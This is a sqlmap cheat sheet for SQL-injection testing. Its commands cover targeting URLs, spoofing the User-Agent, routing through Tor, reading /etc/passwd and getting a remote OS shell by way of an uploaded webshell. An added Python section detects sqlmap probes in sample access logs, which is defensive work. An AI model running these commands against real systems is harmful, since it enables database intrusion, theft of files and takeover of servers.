# sqlmap

## Verbose Level (-v)

* 0: displays critical info only
* 1: displays warning info
* 2: displays debug info
* **3: displays payload used**
* 4: displays HTTP request body
* 5: displays HTTP response headers
* 6: displays HTTP response body

## Database Connection (-d)

Connect directly to a database server with credentials (`DBMS` is one of `mysql`, `oracle`, `mssql`, `postgresql`):

```shell
sqlmap -d "DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME"
```

or connect to a file-based database (`DBMS` is one of `sqlite`, `access`, `firebird`):

```shell
sqlmap -d "DBMS://DATABASE_FILEPATH"
```

## GET (-u)

```shell
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
```

## POST (--data)

```shell
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
```

## Load Request from a File (-r)

```shell
sqlmap -r <request_from_burp>
```

## Cookie (--cookie)

```shell
sqlmap -u <url> --cookie <cookie>
```

## User-Agent (--user-agent)

The default `User-Agent` header sent by sqlmap is `sqlmap/1.0-dev-xxxxxxx`, but we can specify a custom `User-Agent` header:

```shell
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
```

or set a random user agent:

```shell
sqlmap -u <url> --random-agent -f --banner --dbs --users
```
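Because `--user-agent` and `--random-agent` replace the default `sqlmap/...` header, a detection that only matches the User-Agent misses those runs. The following added example (not part of the original cheat sheet) scans constructed access-log lines for both the default sqlmap User-Agent and the time-based and boolean probe patterns that sqlmap sends in the query string:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-abcdef1 (http://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vuln.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default sqlmap User-Agent; --user-agent / --random-agent defeat this check on its own.
UA_RE = re.compile(r"^sqlmap/", re.I)
# Time-based probes (what --risk=2 adds) and boolean tautologies in the decoded query.
PAYLOAD_RE = re.compile(
    r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY|\bAND\s+\d+\s*=\s*\d+", re.I
)


def classify(line):
    """Return the reasons a log line looks like sqlmap activity ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    reasons = []
    if UA_RE.search(m["ua"]):
        reasons.append("default-sqlmap-user-agent")
    # Decode percent-encoding so "%20AND%20SLEEP(5)" is inspected as SQL text.
    query = unquote_plus(m["path"].partition("?")[2])
    if PAYLOAD_RE.search(query):
        reasons.append("sqli-payload-in-query")
    return reasons


def scan(log_text):
    """Map 1-based line numbers of flagged lines to their reasons."""
    findings = {}
    for idx, line in enumerate(log_text.splitlines(), start=1):
        reasons = classify(line)
        if reasons:
            findings[idx] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons)
```

Line 1 is caught by the User-Agent alone, line 2 only by the decoded payload, and line 3 is clean; in production, the source IP and request rate would be the next signals to correlate.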

## Level (--level)

* `--level=1`: default mode
* `--level=2`: adds cookie testing
* `--level=3`: adds User-Agent testing
* `--level=4`: more testing
* `--level=5`: adds Host testing

{% hint style="info" %}
Note that the use of the `-p` switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.
{% endhint %}

## Risk (--risk)

* `--risk=1`: (Default) innocuous injections
* `--risk=2`: Enables heavy time-based injections
* `--risk=3`: Enables OR-based injections; used against an UPDATE query, these would update every row in the table

## Proxy (--proxy) and Tor (--tor)

Proxy:

```shell
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
```

Tor:

```shell
sqlmap --tor -u <url> -f --banner --dbs --users
```

## Blind SQLi (--string, --not-string)

* Pass `--string` a string that is always present in the `True` response page
* Pass `--not-string` a string that is always present in the `False` response page

## Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

```shell
sqlmap -u <url> --is-dba
```

## Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

```shell
sqlmap -u <url> --file-read /etc/passwd
```

Upload a file:

```shell
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
```

## RCE (--os-shell)

The following requirements must be satisfied for `--os-shell` to work:

1. We have write permission
2. Pathnames are default
3. PHP `magic_quotes_gpc` is disabled

```shell
sqlmap -u <url> --os-shell
```

Behind the scenes, sqlmap creates an **"upload trojan"** on the target machine and uploads a **webshell** through it.

If the `-d` option is used, sqlmap will use **UDF**. For example:

```shell
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
```
